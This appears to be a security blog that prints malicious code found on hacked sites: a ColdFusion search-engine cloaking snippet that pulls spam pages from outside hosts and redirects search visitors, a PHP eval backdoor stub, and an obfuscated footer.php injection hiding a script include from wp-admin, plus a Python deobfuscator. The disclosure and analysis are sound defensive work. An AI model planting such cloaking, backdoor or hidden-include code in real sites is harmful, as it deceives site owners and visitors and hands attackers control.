Monday, July 11, 2016

Malicious Code on a ColdFusion Website

Found this piece of malicious code on a ColdFusion-driven website. This is basically black-hat SEO (cloaking): search-engine crawlers and visitors referred from search engines are handled differently from everyone else, so the site owner never sees the injected content.

<!--- Cloaking: only search-engine crawlers (by User-Agent) get the remote spam page --->
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent )) >
    <!--- Fetch the SEO spam page from the attacker's host and return it instead of the real page --->
    <cfhttp url="http://www.lv-asn.com/site/168p1.html" />
    <cfoutput>#cfhttp.filecontent#</cfoutput>
    <cfabort />
</cfif>
<script>
  // Human visitors arriving from Japanese search portals are redirected to the spam site
  var s=document.referrer;
  if(s.indexOf("google.co.jp")>0||s.indexOf("docomo.ne.jp")>0||s.indexOf("yahoo.co.jp")>0)
  {
    self.location="http://www.linekopi.com/product/168p1.html";
  }
</script>

Saturday, July 9, 2016

Malicious Backdoor Script

<?php
// The base64 blob (omitted here) decodes to PHP source, which is then evaluated via a nested eval
$code=base64_decode("..."); eval("return eval(\"$code\");") ?>

Malicious Code was found in footer.php of a popular WordPress theme

The following malicious code was found in footer.php of a popular WordPress theme.

<?php
// Obfuscated key and needle: "UkVRVUVTVF9VUkk=" is REQUEST_URI and "d3AtYWRtaW4=" is wp-admin,
// so the payload is withheld from wp-admin pages and the site owner never notices it.
if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")], base64_decode("d3AtYWRtaW4=")) === false) {
    // Triple base64-encoded payload (an external <script src=...> include), emitted on every
    // page whose URI does not contain wp-admin
    echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));
}
?>
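As an added example (not code from this blog or from the theme), the Python script below statically unwraps the nested base64_decode() calls in the footer.php sample above so the real condition and payload can be read without executing the PHP. The sample input is the snippet from the post; the lenient decoder and the PHP-literal rendering are my own choices.

```python
import base64
import binascii
import re

# Sample input: the footer.php snippet quoted in the post (whitespace collapsed).
FOOTER_PHP = (
    '<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],'
    'base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode('
    'base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgy'
    'VVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));} ?>'
)

# Matches only an innermost call whose argument is a string literal, so nested
# chains are peeled one layer per pass. \s is allowed inside the literal because
# decoded layers often carry a trailing CR/LF left by the tool that produced them.
INNER_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=\s]*)\1\s*\)')

def lenient_b64decode(text):
    """Decode base64 after dropping non-alphabet characters and repairing padding."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", text)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean)

def php_string(data):
    """Render decoded bytes as a PHP double-quoted string literal."""
    text = data.decode("latin-1")
    for ch in ("\\", '"', "$"):
        text = text.replace(ch, "\\" + ch)
    return '"' + text + '"'

def _unwrap_once(match):
    try:
        return php_string(lenient_b64decode(match.group(2)))
    except (binascii.Error, ValueError):
        return match.group(0)  # not valid base64: leave the call untouched

def deobfuscate(php_source, max_passes=10):
    """Replace base64_decode("literal") with the literal it yields, innermost first,
    until no decodable call remains or the pass limit is hit."""
    for _ in range(max_passes):
        rewritten = INNER_CALL.sub(_unwrap_once, php_source)
        if rewritten == php_source:
            return php_source
        php_source = rewritten
    return php_source

if __name__ == "__main__":
    print(deobfuscate(FOOTER_PHP))
```

The rewritten source shows the `$_SERVER["REQUEST_URI"]` / `"wp-admin"` check in the clear and the echoed payload as a plain `<script src=...>` tag, which is what a reviewer needs to decide whether the footer is legitimate.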